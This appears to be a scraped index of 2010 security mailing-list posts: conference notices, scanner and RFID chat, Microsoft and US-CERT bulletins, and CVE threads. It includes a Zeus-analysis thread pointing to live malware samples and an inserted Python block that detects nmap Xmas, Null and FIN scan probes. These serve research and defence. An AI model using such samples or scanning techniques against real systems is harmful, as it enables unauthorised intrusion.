http://www.husapresidentpark.com/
Not too far from station, ok bar, standard hotel prices. Quite nice
hotel unless you got the room where the bathroom flooded, can't
remember who got that one.
I'll be there for the VOIP class so see you there.
Robin
Brucon
Nils (Sep 02)
Hi,
anyone going to Brucon and eventually to one of the classes prior?
Any hotel recommendations?
I'd like to go there the Tuesday prior to the class and check in late
afternoon.
Nils
Re: vulnerability scanners
Francois Lachance (Sep 02)
Forrester recently published a research paper titled "The Forrester Wave™:
Vulnerability Management, Q2 2010" (
http://www.forrester.com/rb/Research/wave%26trade%3B_vulnerability_management%2C_q2_2010/q/id/56932/t/2).
It costs $1,740 USD to purchase that report (ouch!). I am fortunate enough
to work for a corporation that has a membership with Forrester. Take a look
at the executive summary to give you an idea of which vendors they...
Re: RFID: What to get?
Larry Pesce (Sep 01)
They sure did. Cleared out my local 'Shack of them.
- L
Re: RFID: What to get?
Bill Swearingen (Sep 01)
Radio Shack had some Arduino compatible Parallax RFID readers (with tags)
for super cheap ($5 or something?) a few months ago. You should check your
local stores, they are in the parts bins.
http://www.parallax.com/rs
Re: RFID: What to get?
Bacon Zombie (Sep 01)
Hey,
I picked up a Proxmark3 <http://cq.cx/proxmark3.pl> cheap on the last day of
26c3 <http://events.ccc.de/congress/2009/wiki/Proxmark3>, it does both
low- (~125 kHz) and high- (~13.56 MHz) frequency RFID tags.
And still have not gotten around to playing / using it properly, but we are
kicking off a RFID night at Dublin Hackerspace so that should force me to
start learning how to use it.
Some of the others in the space have the...
Re: RFID: What to get?
Robin Wood (Sep 01)
I keep telling myself that my free time will go up but that never
happens either!
Re: RFID: What to get?
Michael Miller (Sep 01)
I keep on telling myself that the cost will come down. That has yet to happen.
Re: Vulnerability Scanners
Albert R. Campa (Sep 01)
A Nessus Pro feed will let you do that same DoD audit in a non-intrusive way
via credentialed scan. Don't know how Nexpose or others work in that regard,
I assume the same way.
__________________________________
Albert R. Campa
On Wed, Sep 1, 2010 at 7:14 AM, Herndon Elliott <alabamatoy () gmail com>wrote:
Re: Vulnerability Scanners
Herndon Elliott (Sep 01)
...
gold disc and SRRs. http://iase.disa.mil/stigs/index.html and
http://iase.disa.mil/stigs/faq.html
Pros: Free, updated, widely used throughout DoD, produce useable results,
all moving slowly to XML basis and VMS output
Cons: Clunky, quirky (but pretty effective), requires DoD PKI cert for
access, some of the checks are manual/interview
Caution, do NOT use the "remediate" button in gold disc or you *will* brick
the box!
Herndon...
Re: vulnerability scanners
Albert R. Campa (Aug 31)
This is true. When you said Core, i thought, do they have a vuln scanner?
I installed Nessus home and Nexpose community on BT4 and did some scanning
and comparison. I haven't had time to put everything together, but as someone
stated it would be good to test them out.
__________________________________
Albert R. Campa
Honeypots — Discussions about tracking attackers by setting up decoy honeypots or entire honeynet networks.
nullcon Goa dwitiya (2.0) Call For Papers
nullcon (Sep 01)
nullcon Dwitiya (2.0)
The Jugaad(hacking) Conference
nullcon is an initiative by null - The open security community.
Website:
http://nullcon.net
Calling all Jugaadus(hackers)
It's the time of the year when we welcome research done by the
community as paper submissions for nullcon.
So, sip your coffee, dust your debuggers, fire your tools, challenge
your grey cells and shoot us an email.
Tracks:
---------------
- Bakkar: 1 Hr Talks
-...
[HITB-Announce] HITB2010 SIGNINT Sessions
Hafez Kamal (Aug 26)
Hack In The Box is proud to announce a brand new lightning session
called HITB SIGINT (Signal Intelligence/Interrupt)! HITB SIGINT
sessions are designed to provide a quick 15 minute overview for
material and research that's up and coming - stuff that isn't quite
ready for the mainstream tracks of the conference but deserves a mention
nonetheless. Final year students who want to present their projects to
industry experts are also strongly...
Re: honeypot needed for waf testing
Valdis . Kletnieks (Aug 24)
On Mon, 23 Aug 2010 08:21:29 PDT, false said:
There are tools to do specifically that. However, you probably already have many
of the tools you need - just point stuff like nmap and nessus at your honeypot
and see if your WAF notices. If it doesn't notice you doing the nmap, it won't
notice an attacker doing the nmap. If you have hping3, try sending a few
christmas-tree packets at your honeypot, see what happens. Get a copy of
metasploit and...
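One caveat on the advice above: a WAF inspects HTTP, so an nmap port scan or a Christmas-tree probe exercises whatever network-level filtering sits in front of the honeypot rather than the WAF's request rules. What follows is an added example of the detection side of that test, not code from the original post or from nmap: it builds a few raw TCP headers as constructed sample traffic, then classifies the flag combinations that nmap's -sX (FIN, PSH and URG set), -sN (no flags) and -sF (FIN only) probes carry. The header builder is only a way to produce sample input offline; it does not send anything.

```python
import struct

# TCP flag bits in the flags byte (RFC 793).
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20
TCP_HDR = "!HHIIBBHHH"  # src, dst, seq, ack, offset/reserved, flags, window, csum, urgptr


def build_tcp_header(src_port, dst_port, flags, seq=0, ack=0, window=1024):
    """Construct a minimal 20-byte TCP header (no options, checksum left zero).

    This is sample input for the detector below, not a packet sender: the
    checksum and sequence numbers are not meaningful."""
    data_offset = 5 << 4  # header length in 32-bit words, reserved bits zero
    return struct.pack(TCP_HDR, src_port, dst_port, seq, ack, data_offset, flags, window, 0, 0)


def parse_tcp_header(segment):
    """Return (src_port, dst_port, flags) from the first 20 bytes of a TCP segment."""
    if len(segment) < 20:
        raise ValueError("truncated TCP header")
    src, dst, _seq, _ack, _off, flags, _win, _csum, _urg = struct.unpack(TCP_HDR, segment[:20])
    return src, dst, flags


def classify_flags(flags):
    """Map a flag byte to the nmap probe it matches, or None for ordinary traffic.

    nmap -sX (Christmas tree) sets FIN, PSH and URG; -sN sets nothing; -sF sets
    only FIN. A lone FIN without ACK and a SYN+FIN combination never occur in a
    legitimate TCP conversation, so they are worth alerting on as well."""
    probe = flags & (FIN | SYN | RST | PSH | ACK | URG)
    if probe == 0:
        return "null-scan"
    if probe == FIN | PSH | URG:
        return "xmas-scan"
    if probe == FIN:
        return "fin-scan"
    if probe & SYN and probe & FIN:
        return "syn-fin"
    return None


def scan_alerts(segments):
    """Run the classifier over raw TCP segments and return (kind, src, dst) alerts."""
    alerts = []
    for seg in segments:
        src, dst, flags = parse_tcp_header(seg)
        kind = classify_flags(flags)
        if kind is not None:
            alerts.append((kind, src, dst))
    return alerts


# Constructed sample traffic: one normal SYN, one normal data segment, and
# three probes of the kind nmap would send at the honeypot.
SAMPLE_SEGMENTS = [
    build_tcp_header(40000, 80, SYN),
    build_tcp_header(40001, 80, FIN | PSH | URG),  # nmap -sX
    build_tcp_header(40002, 443, 0),               # nmap -sN
    build_tcp_header(40003, 80, ACK | PSH),        # established-connection data
    build_tcp_header(40004, 80, FIN),              # nmap -sF
]

if __name__ == "__main__":
    for alert in scan_alerts(SAMPLE_SEGMENTS):
        print("%-10s %d -> %d" % alert)
```

To use it against the lab, feed it the TCP payload of each captured frame (after the Ethernet and IP headers) while the scan runs; if the filter in front of the honeypot is doing its job, the classifier should see the probes on the client side of the WAF and nothing on the webserver side.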
honeypot needed for waf testing
false (Aug 23)
I need to test my WAF. I want to set up a simple network in the lab like this:
XP or Linux client <--> WAF <--> Honeypot/test webserver
1) Does anyone have any suggestions on what I can use to simulate/generate attacks/suspicious traffic towards the
webserver from my client?
2) Is there a honeypot image out there that I can download that would be good to be the role of my test
webserver?
Any suggestions or ideas are very much...
Ruxcon 2010 Final Call For Papers
cfp (Aug 20)
RUXCON 2010 FINAL CALL FOR PAPERS
Ruxcon would like to announce the final call for papers for the sixth annual Ruxcon conference.
This year the conference will take place over the weekend of 20th and 21st of November.
Ruxcon will be held at CQ, Melbourne, Australia.
The deadline for submissions is the 10th of October.
What is Ruxcon?
Ruxcon is the premiere technical computer security conference within Australia. Ruxcon aspires to bring...
[HITB-Ann] Reminder: HITB2010 Malaysia Call for Papers Closing August 9th
Hafez Kamal (Jul 29)
This is a reminder that the Call for Papers for Asia's largest network
security event, HITBSecConf2010 - Malaysia is closing on the 9th of August!
This will be a QUAD TRACK conference featuring 2 dedicated tracks
focusing on cutting edge attack and defense techniques, a track with
dedicated hands-on lab sessions and a brand new lightning talk segment!
HITB CFP: http://cfp.hackinthebox.org/
===
Venue: Crowne Plaza Mutiara Kuala Lumpur...
[HITB-Announce] HITB Magazine Issue 003 + HITBSecConf2010 - Amsterdam
Hafez Kamal (Jul 04)
Our first ever HITBSecConf in Europe is over! A big big thank you to all
our sponsors, speakers, crew, volunteers and of course attendees who
made it over to join us!!!
We're already planning for 2011 and the tentative timing for the HITB
Europe is mid May (stay tuned to our @hitbsecconf twitter stream for all
conference updates).
All conference materials from the event can be downloaded from...
CFP: Deadline Extended: SLAML'10
Mohror, Kathryn (Jun 16)
Workshop on Managing Systems via Log Analysis and Machine
Learning Techniques (SLAML '10)
=============================================
October 2-3, 2010
Vancouver, BC, Canada
(at OSDI)
http://www.usenix.org/events/slaml10/cfp/
=============================================
********...
[HITB-Announce] HITBSecConf2010 - Malaysia Call for Papers
Hafez Kamal (May 19)
The Call for Papers for HITB Security Conference 2010 Malaysia is now open!
Talks that are more technical or that discuss new and never before seen
attack methods are of more interest than a subject that has been covered
several times before. Submissions are due no later than 9th August 2010.
HITB CFP: http://cfp.hackinthebox.org/
===
Date: October 11th - 14th 2010
Venue: Crowne Plaza Mutiara Kuala Lumpur
Keynote 1: Chris Wysopal...
RE: info reg Zeus bot detection and analysis
Younger Tyler (May 19)
Any tips on how to selectively get infected with Zeus?
You can find the latest Zeus variants here http://www.malwaredomainlist.com/mdl.php
Tyler
-----Original Message-----
From: listbounce () securityfocus com [mailto:listbounce () securityfocus com] On Behalf Of Michele Zoerb
Sent: Wednesday, May 19, 2010 11:39 AM
To: Mayank.2.Bhatnagar; honeypot honeypot
Subject: RE: info reg Zeus bot detection and analysis
Interesting thoughts as I am just...
RE: info reg Zeus bot detection and analysis
Gary Derania (May 19)
------Original Message------
From: "Michele Zoerb" <mzoerb () the41 com>
To: "Mayank.2.Bhatnagar" <MBhatnagar () ipolicynetworks com>"honeypot honeypot" <honeypots () securityfocus com>
Sent: Wed 2010-05-19 08:48
Subject: RE: info reg Zeus bot detection and analysis
Interesting thoughts as I am just starting the same type of project. I want to get infected by Zeus and perform some
analysis. I...
RE: info reg Zeus bot detection and analysis
Michele Zoerb (May 19)
Interesting thoughts as I am just starting the same type of project. I want to get infected by Zeus and perform some
analysis. I have a closed environment, but didn't think that detecting a virtual environment would be an issue for the
bot. I will put my VMconverter onto a separate machine and clone from there.
Any tips on how to selectively get infected with Zeus?
Thanks,
Chele
-----Original Message-----
From: listbounce () securityfocus...
info reg Zeus bot detection and analysis
Mayank.2.Bhatnagar (May 19)
Hi everyone,
We are able to collect several samples of Zeus bot and there are many variants of the same.
However when we try to analyse it in our sandbox and closed environment, we are not able to get any activity.
There are several reports available, which are for the same md5sum sample but still after much of analysis and triggering
attempts, either the malicious sample doesn't trigger or if it does, it doesn't show any network activity.
What...
[HITB-Announce] HITB eZine Issue 002 out now!
Hafez Kamal (Apr 23)
The second quarterly HITB eZine (issue 002) has been released! Grab your
copies from here:
https://www.hackinthebox.org/modules.php?op=modload&name=News&file=article&sid=35995
===
3 months ago, our newly 'reborn' ezine was a completely new experience
to our small team and we didn't expect it to have a lot of followers
considering its absence for many years. But to our surprise, we received
over 20K downloads just weeks after its...
[HITB-Announce] FINAL CALL - CFP for HITBSecConf2010 Amsterdam
Hafez Kamal (Apr 08)
This is the FINAL CALL to submit your talk / presentation proposals for
the inaugural HITB Security Conference in Europe! Submissions are due
by 19TH APRIL 2010.
HITBSecConf2010 - Amsterdam takes place at the Grand Krasnapolsky from
the 29th of June till the 2nd of July (Tuesday - Friday) with keynote
speakers Anton Chuvakin and Mark Curphey in our _first ever_ QUAD TRACK
conference.
To submit your presentation proposals and for further details...
Microsoft Sec Notification — Beware that MS often uses these security bulletins as marketing propaganda to downplay serious vulnerabilities in their products—note how most have a prominent and often-misleading "mitigating factors" section.
Microsoft Security Bulletin Minor Revisions
Microsoft (Sep 01)
********************************************************************
Title: Microsoft Security Bulletin Minor Revisions
Issued: September 1, 2010
********************************************************************
Summary
=======
The following bulletins have undergone a minor revision increment.
Please see the appropriate bulletin for more details.
* MS10-056 - Critical
* MS10-049 - Critical
Bulletin Information:
=====================
*...
Microsoft Security Advisory Notification
Microsoft (Aug 31)
********************************************************************
Title: Microsoft Security Advisory Notification
Issued: August 31, 2010
********************************************************************
Security Advisories Updated or Released Today
==============================================
* Microsoft Security Advisory (2269637)
- Title: Insecure Library Loading Could Allow Remote
Code Execution
-...
Microsoft Security Bulletin Minor Revisions
Microsoft (Aug 25)
********************************************************************
Title: Microsoft Security Bulletin Minor Revisions
Issued: August 25, 2010
********************************************************************
Summary
=======
The following bulletins have undergone a minor revision increment.
Please see the appropriate bulletin for more details.
* MS10-056 - Critical
* MS10-054 - Critical
Bulletin Information:
=====================
*...
Microsoft Security Bulletin Minor Revision
Microsoft (Aug 24)
********************************************************************
Title: Microsoft Security Bulletin Minor Revision
Issued: August 24, 2010
********************************************************************
Summary
=======
The following bulletin has undergone a minor revision increment.
Please see the appropriate bulletin for more details.
* MS10-046 - Critical
Bulletin Information:
=====================
* MS10-046 - Critical
-...
Microsoft Security Advisory Notification
Microsoft (Aug 23)
********************************************************************
Title: Microsoft Security Advisory Notification
Issued: August 23, 2010
********************************************************************
Security Advisories Updated or Released Today
==============================================
* Microsoft Security Advisory (2269637)
- Title: Insecure Library Loading Could Allow Remote
Code Execution
-...
Microsoft Security Bulletin Minor Revisions
Microsoft (Aug 18)
********************************************************************
Title: Microsoft Security Bulletin Minor Revisions
Issued: August 18, 2010
********************************************************************
Summary
=======
The following bulletins have undergone a minor revision increment.
Please see the appropriate bulletin for more details.
* MS10-058 - Important
Bulletin Information:
=====================
* MS10-058 - Important...
Microsoft Security Bulletin Minor Revisions
Microsoft (Aug 11)
********************************************************************
Title: Microsoft Security Bulletin Minor Revisions
Issued: August 11, 2010
********************************************************************
Summary
=======
The following bulletins have undergone a minor revision increment.
Please see the appropriate bulletin for more details.
* MS10-060 - Critical
* MS10-057 - Important
* MS10-056 - Critical
* MS10-054 - Critical...
Microsoft Security Advisory Notification
Microsoft (Aug 10)
********************************************************************
Title: Microsoft Security Advisory Notification
Issued: August 10, 2010
********************************************************************
Security Advisories Updated or Released Today
==============================================
* Microsoft Security Advisory (977377)
- Title: Vulnerability in TLS/SSL Could Allow Spoofing
-...
Microsoft Security Bulletin Summary for August 2010
Microsoft (Aug 10)
********************************************************************
Microsoft Security Bulletin Summary for August 2010
Issued: August 10, 2010
********************************************************************
This bulletin summary lists security bulletins released for
August 2010.
The full version of the Microsoft Security Bulletin Summary for
August 2010 can be found at
http://www.microsoft.com/technet/security/bulletin/ms10-aug.mspx....
Microsoft Security Bulletin Advance Notification for August 2010
Microsoft (Aug 05)
********************************************************************
Microsoft Security Bulletin Advance Notification for August 2010
Issued: August 5, 2010
********************************************************************
This is an advance notification of security bulletins that
Microsoft is intending to release on August 10, 2010.
The full version of the Microsoft Security Bulletin Advance
Notification for August 2010 can be found at...
Microsoft Security Bulletin Minor Revisions
Microsoft (Aug 03)
********************************************************************
Title: Microsoft Security Bulletin Minor Revisions
Issued: August 3, 2010
********************************************************************
Summary
=======
The following bulletins have undergone a minor revision increment.
Please see the appropriate bulletin for more details.
* MS10-046 - Critical
Bulletin Information:
=====================
* MS10-046 - Critical
-...
Microsoft Security Bulletin Summary for August 2010
Microsoft (Aug 02)
********************************************************************
Microsoft Security Bulletin Summary for August 2010
Issued: August 2, 2010
********************************************************************
This bulletin summary lists the out-of-band security bulletin
released on August 2, 2010.
The full version of the Microsoft Security Bulletin Summary for
August 2010 can be found at...
Microsoft Security Bulletin Advance Notification for August 2010
Microsoft (Jul 30)
********************************************************************
Microsoft Security Bulletin Advance Notification for August 2010
Issued: July 30, 2010
********************************************************************
This is an advance notification of one out-of-band security bulletin
that Microsoft is intending to release on August 2, 2010.
The full version of the Microsoft Security Bulletin Advance
Notification for August 2010 can be...
Microsoft Security Bulletin Minor Revision
Microsoft (Jul 21)
********************************************************************
Title: Microsoft Security Bulletin Minor Revision
Issued: July 21, 2010
********************************************************************
Summary
=======
The following bulletin has undergone a minor revision increment.
* MS09-014 - Critical
Bulletin Information:
=====================
* MS09-014 - Critical
-...
Microsoft Security Advisory Notification
Microsoft (Jul 20)
********************************************************************
Title: Microsoft Security Advisory Notification
Issued: July 20, 2010
********************************************************************
Security Advisory Updated Today
==============================================
* Microsoft Security Advisory (2286198)
- Title: Vulnerability in Windows Shell Could Allow
Remote Code Execution
-...
Funsec — While most security lists ban off-topic discussion, Funsec is a haven for free community discussion and enjoyment of the lighter, more humorous side of the security community
Re: Snoop Dogg's Magic Symantec Bus
Skyler King (Sep 02)
http://hackiswack.com
Patents, philanthropy, and other disasters ...
Rob, grandpa of Ryan, Trevor, Devon & Hannah (Sep 02)
A rather depressing story: everyone supposedly full of good intentions, and yet
lots of tragedy to go around.
http://www.nytimes.com/2010/09/05/magazine/05Plumpy-t.html
====================== (quote inserted randomly by Pegasus Mailer)
rslade () vcn bc ca slade () victoria tc ca rslade () computercrime org
Any noun can be verbed. - Alan J. Perlis
victoria.tc.ca/techrev/rms.htm...
Do you have a lethargic whale on your hands?
Ned Fleming (Sep 02)
Life imitates The Simpsons:
http://www.telegraph.co.uk/earth/wildlife/7977013/Whale-put-to-death-with-explosives.html
Quantum system hacked in 'blinding' attack
Jeffrey Walton (Sep 02)
http://www.v3.co.uk/v3/news/2268908/quantum-system-hacked-blinding
Re: Poor quantum encryption
Dave Paris (Sep 02)
I want to move to Theory. Everything works there.
Krebs: FCC Must Make ISPs Crack Down on Spammers and Malware
Paul Ferguson (Sep 01)
Via CSO Online.
[snip]
The Federal Communications Commission (FCC) is asking for help in
developing a "Cybersecurity Roadmap," an ambitious plan to identify
dangerous vulnerabilities in the Internet infrastructure, as well as
threats to consumers, businesses and governments.
The one piece of advice I will offer the commission is to begin measuring
the responsiveness of Internet service providers (ISPs) and hosting
companies in...
Researchers knock part of the Internet offline
Jeffrey Walton (Sep 01)
http://gcn.com/articles/2010/08/31/internet-experiment-goes-awry.aspx
Poor quantum encryption
Rob, grandpa of Ryan, Trevor, Devon & Hannah (Sep 01)
Theoretically perfect, and so full of holes ...
http://www.v3.co.uk/v3/news/2268908/quantum-system-hacked-blinding
====================== (quote inserted randomly by Pegasus Mailer)
rslade () vcn bc ca slade () victoria tc ca rslade () computercrime org
[V]isions of those notorious $900 Gucci dog bowls flit through
your mind, and you're haunted by the possibility that your
cynicism isn't polished enough to second-guess the world's...
Snoop Dogg's Magic Symantec Bus
Shawn Merdinger (Sep 01)
http://www.huffingtonpost.com/2010/08/31/snoop-dogg-raps-about-cyb_n_700876.html
"The legendary LBC rapper held court inside a Symantec Corporation
18-wheeler across from Bryant Park..."
Hackers attack Philippine government website
Juha-Matti Laurio (Aug 31)
"The Philippines on Sunday ordered all government offices to tighten Internet security after its main
information website was brought down by hackers.
"We are alerting all government agencies to review and improve security of their websites in view
of the hacking of the website this afternoon," presidential spokesman Herminio Coloma said.
...
Coloma did not say whether the hacker attack was related to widespread public anger in...
Re: Fwd: [ISN] Gareth Williams: 'backroom boy' spy was really a high-flier
Robert Kim App and Facebook Marketing (Aug 31)
No Obvious Signs? Really, THATS supposed to be reassuring?
In the words of Gene Hackman in Enemy of the State, "he's either
really really dumb, or really, really smart."
Re: Fwd: [ISN] Gareth Williams: 'backroom boy' spy was really a high-flier
Valdis . Kletnieks (Aug 31)
On Mon, 30 Aug 2010 16:10:08 CDT, Ned Fleming said:
I think it's a pretty good assumption that bodies that died of natural causes
rarely end up stuffed in a bag in the bathroom. And "no obvious signs" doesn't
mean much if it was a spook-on-spook thing.
Re: Fwd: [ISN] Gareth Williams: 'backroom boy' spy was really a high-flier
Ned Fleming (Aug 30)
[sniperoo]
'Other Than the Body in a Bag, That Is
"British media reported [intelligence agent Gareth] Williams' body was
found stuffed in a bag in the bathroom of his apartment with no
obvious signs of foul play."--CNN.com, Aug. 28'
from the WSJ's Best of the Web Today.
Ongoing FTP Brute Password guessing attacks
Juha-Matti Laurio (Aug 30)
via
http://isc.sans.edu/diary.html?storyid=9454
Especially the good, old tips are worth reading:
Watch your logs!
Remove Anonymous Access
Restrict Access to FTP
Juha-Matti
Fwd: [ISN] Pentagon considers preemptive strikes as part of cyber-defense strategy
Paul Ferguson (Aug 29)
This demonstrates -- to me -- some very, very poor judgment.
- ferg
---------- Forwarded message ----------
From: InfoSec News <alerts () infosecnews org>
Date: Sun, Aug 29, 2010 at 10:36 PM
Subject: [ISN] Pentagon considers preemptive strikes as part of
cyber-defense strategy
To: isn () infosecnews org
http://www.washingtonpost.com/wp-dyn/content/article/2010/08/28/AR2010082803849.html
By Ellen Nakashima
Washington Post Staff Writer...
CERT Advisories — The Computer Emergency Response Team has been responding to security incidents and sharing vulnerability information since the Morris Worm hit in 1986. This archive combines their technical security alerts, tips, and current activity lists.
Current Activity - Insecure Loading of Dynamic Link Libraries in Windows Applications
Current Activity (Sep 01)
US-CERT Current Activity
Insecure Loading of Dynamic Link Libraries in Windows Applications
Original release date: August 25, 2010 at 12:01 pm
Last revised: September 1, 2010 at 10:27 am
US-CERT is aware of a class of vulnerabilities related to how some
Windows applications may load external dynamic link libraries (DLLs).
When an application loads a DLL without specifying a fully qualified
path name, Windows will attempt to locate the DLL by...
Current Activity - VMware Releases Updates for ESX Service Console Packages
Current Activity (Sep 01)
US-CERT Current Activity
VMware Releases Updates for ESX Service Console Packages
Original release date: September 1, 2010 at 9:32 am
Last revised: September 1, 2010 at 9:32 am
VMware has released security updates for multiple third party packages
for the ESX Service Console. These updates address vulnerabilities in
the perl, krb5, samba, tar, and cpio packages. Exploitation of these
vulnerabilities may allow an attacker to execute arbitrary...
Current Activity - RealNetworks Releases Update to Address Vulnerabilities in RealPlayer
Current Activity (Aug 31)
US-CERT Current Activity
RealNetworks Releases Update to Address Vulnerabilities in RealPlayer
Original release date: August 31, 2010 at 8:23 am
Last revised: August 31, 2010 at 8:23 am
RealNetworks, Inc. has released an update for RealPlayer to address
multiple vulnerabilities. These vulnerabilities may allow a remote,
unauthenticated attacker to execute arbitrary code or obtain sensitive
information.
US-CERT encourages users and...
Current Activity - Cisco Releases Security Advisory for IOS XR Software Border Gateway Protocol
Current Activity (Aug 31)
US-CERT Current Activity
Cisco Releases Security Advisory for IOS XR Software Border Gateway Protocol
Original release date: August 31, 2010 at 8:40 am
Last revised: August 31, 2010 at 8:40 am
Cisco has released a security advisory to address a vulnerability in
the Cisco IOS XR Software Border Gateway Protocol feature.
Exploitation of this vulnerability may result in the continuous
resetting of BGP peering sessions, which may cause a...
TA10-238A -- Microsoft Windows Insecurely Loads Dynamic Libraries
US-CERT Technical Alerts (Aug 26)
National Cyber Alert System
Technical Cyber Security Alert TA10-238A
Microsoft Windows Insecurely Loads Dynamic Libraries
Original release date: August 26, 2010
Last revised: --
Source: US-CERT
Systems Affected
Any application running on the Microsoft Windows platform that
uses dynamically linked libraries (DLLs) may be affected. Whether
or not an application is vulnerable depends on...
Current Activity - Cisco Releases Advisories for Unified Communications Manager and Unified Presence
Current Activity (Aug 25)
US-CERT Current Activity
Cisco Releases Advisories for Unified Communications Manager and Unified Presence
Original release date: August 25, 2010 at 1:53 pm
Last revised: August 25, 2010 at 1:53 pm
Cisco has released security advisories to address multiple
vulnerabilities affecting Unified Communications Manager and Unified
Presence.
These vulnerabilities affect the processing of Session Initiation
Protocol (SIP) messages. Exploitation of...
Current Activity - APWG Fax Back Phishing Education Program
Current Activity (Aug 25)
US-CERT Current Activity
APWG Fax Back Phishing Education Program
Original release date: August 25, 2010 at 1:16 pm
Last revised: August 25, 2010 at 1:16 pm
In an effort to respond to a growing public threat by offline phishers
that conduct various scams via fax, the Anti-phishing Working Group
(APWG) has partnered with the Internal Revenue Service (IRS) to create
the APWG Fax Back Phishing Education Program. This program is designed
to...
Current Activity - Insecure Loading of Dynamic Link Libraries in Windows Applications
Current Activity (Aug 25)
US-CERT Current Activity
Insecure Loading of Dynamic Link Libraries in Windows Applications
Original release date: August 25, 2010 at 12:01 pm
Last revised: August 25, 2010 at 12:01 pm
US-CERT is aware of a class of vulnerabilities related to how some
Windows applications may load external dynamic link libraries (DLLs).
When an application loads a DLL without specifying a fully qualified
path name, Windows will attempt to locate the DLL by...
Cyber Security Tip ST05-014 -- Real-World Warnings Keep You Safe Online
US-CERT Security Tips (Aug 25)
Cyber Security Tip ST05-014
Real-World Warnings Keep You Safe Online
Many of the warning phrases you probably heard from your parents and
teachers are also applicable to using computers and the internet.
Why are these warnings important?
Like the real world, technology and the internet present dangers as well as
benefits. Equipment fails, attackers may target you, and mistakes and poor...
Current Activity - Adobe Releases Security Bulletin for Shockwave Player
Current Activity (Aug 25)
US-CERT Current Activity
Adobe Releases Security Bulletin for Shockwave Player
Original release date: August 25, 2010 at 8:15 am
Last revised: August 25, 2010 at 8:15 am
Adobe has released a security update to address multiple
vulnerabilities affecting Shockwave Player 11.5.7.609 and earlier
versions. These vulnerabilities may allow an attacker to execute
arbitrary code.
US-CERT encourages users and administrators to review Adobe security...
Current Activity - Apple Releases Security Update 2010-005
Current Activity (Aug 25)
US-CERT Current Activity
Apple Releases Security Update 2010-005
Original release date: August 25, 2010 at 8:15 am
Last revised: August 25, 2010 at 8:15 am
Apple has released security update 2010-005 to address multiple
vulnerabilities affecting the ATS, CFNetwork, ClamAV, CoreGraphics,
libsecurity, PHP, and Samba applications. These vulnerabilities may
allow an attacker to execute arbitrary code, obtain sensitive
information, cause a...
Current Activity - Microsoft Releases Security Advisory
Current Activity (Aug 24)
US-CERT Current Activity
Microsoft Releases Security Advisory
Original release date: August 24, 2010 at 11:42 am
Last revised: August 24, 2010 at 11:42 am
Microsoft has released a security advisory indicating that it is aware
of a remote attack vector for a class of vulnerabilities related to
how applications load external dynamic link libraries (DLLs). If an
application does not securely load DLL files, an attacker may be able
to cause the...
Current Activity - Google Releases Chrome 5.0.375.127
Current Activity (Aug 20)
US-CERT Current Activity
Google Releases Chrome 5.0.375.127
Original release date: August 20, 2010 at 8:47 am
Last revised: August 20, 2010 at 8:47 am
Google has released Chrome 5.0.375.127 for Windows, Mac, and Linux to
address multiple vulnerabilities. These vulnerabilities may allow an
attacker to execute arbitrary code, cause a denial-of-service
condition, or conduct spoofing attacks.
US-CERT encourages users and administrators to review...
TA10-231A -- Adobe Reader and Acrobat Vulnerabilities
US-CERT Technical Alerts (Aug 19)
National Cyber Alert System
Technical Cyber Security Alert TA10-231A
Adobe Reader and Acrobat Vulnerabilities
Original release date: August 19, 2010
Last revised: --
Source: US-CERT
Systems Affected
* Adobe Reader 9.3.3 and earlier versions for Windows, Macintosh, and UNIX
* Adobe Acrobat 9.3.3 and earlier versions for Windows and Macintosh
* Adobe Reader 8.2.3 and earlier versions...
Current Activity - Cisco IOS Software Vulnerability
Current Activity (Aug 13)
US-CERT Current Activity
Cisco IOS Software Vulnerability
Original release date: August 13, 2010 at 8:22 am
Last revised: August 13, 2010 at 8:22 am
Cisco has released a security advisory to address a vulnerability
affecting IOS Software Release 1.5.1(2)T. This vulnerability may allow
an attacker to cause a denial-of-service condition by sending a
specially crafted packet through normal network traffic.
US-CERT encourages users and...
Open Source Security — Discussion of security flaws, concepts, and practices in the Open Source community
Re: CVE id request: libc fortify source information disclosure
Dan Rosenberg (Sep 02)
I retract my previous statement - you're correct that the backtrace
also can reveal this same information. Perhaps this is an acceptable
risk, since I can't think of a single real-life case where this would
have actually been useful to an attacker (although it's not too hard
to imagine such a situation). Or perhaps printing out any of this
information to unprivileged users running suid applications should be
reconsidered.
-Dan
Re: CVE id request: libc fortify source information disclosure
Tomas Hoger (Sep 02)
In case of stack protector failed check, it's still an attempt to
print-out info based on what's known to be (partially) corrupted.
Re: CVE id request: libc fortify source information disclosure
Dan Rosenberg (Sep 02)
Tomas,
You are correct. Both the __stack_chk_fail(), which is inserted due
to stack protection, and the more general __chk_fail(), which is
inserted due to FORTIFY_SOURCE and may trigger for static buffer
overflows in other segments, call out to the same __fortify_fail()
function to print out the stack trace.
The backtrace or memory map don't really contain any potentially
sensitive information that couldn't be obtained otherwise. It's just...
Re: CVE id request: libc fortify source information disclosure
Tomas Hoger (Sep 02)
For the sake of correctness, the protective technology that kicks in in
Dan's example is stack protector, not FORTIFY_SOURCE. Though it's
probably still glibc to blame for using the same error-reporting
function in both cases.
It seems the fix would need to remove all possibly-useful info from the
error message.
CVE-2010-2960 kernel: keyctl_session_to_parent null ptr deref
Eugene Teo (Sep 01)
Reported by Tavis Ormandy.
Patches (not in upstream yet):
https://bugzilla.redhat.com/show_bug.cgi?id=627440#c4
https://bugzilla.redhat.com/show_bug.cgi?id=627440#c5
You might need to comment out all the pam_keyinit calls in /etc/pam.d/
to reproduce the problem if the version of the kernel you are using is
affected.
Introduced via upstream commit ee18d64c (v2.6.32-rc1).
References:
https://bugzilla.redhat.com/CVE-2010-2960...
Re: CVE Request -- phpMyAdmin - v3.6.6 -- XSS attack using debugging messages (CVE-2010-3056 discussion)
Josh Bressers (Sep 01)
Please use CVE-2010-2958
Thanks.
CVE Request -- phpMyAdmin - v3.6.6 -- XSS attack using debugging messages (CVE-2010-3056 discussion)
Jan Lieskovsky (Sep 01)
Hi Steve, vendors,
on 2010-08-30 phpMyAdmin published PMASA-2010-6 addressing one XSS:
[1] http://www.phpmyadmin.net/home_page/security/PMASA-2010-6.php
Summary (from [1]):
XSS attack using debugging messages.
Description (from [1]):
It was possible to conduct a XSS attack using error messages in PHP backtrace.
Affected versions (from [1]):
For 3.x: versions before 3.3.6 are affected.
Branch 2.11.x is not...
CVE-2010-2954 kernel: irda null ptr deref
Eugene Teo (Aug 31)
Reported by Taviso Ormandy.
Patch at: http://www.spinics.net/lists/netdev/msg139404.html.
References:
https://bugzilla.redhat.com/CVE-2010-2954
http://twitter.com/taviso/status/22635752128
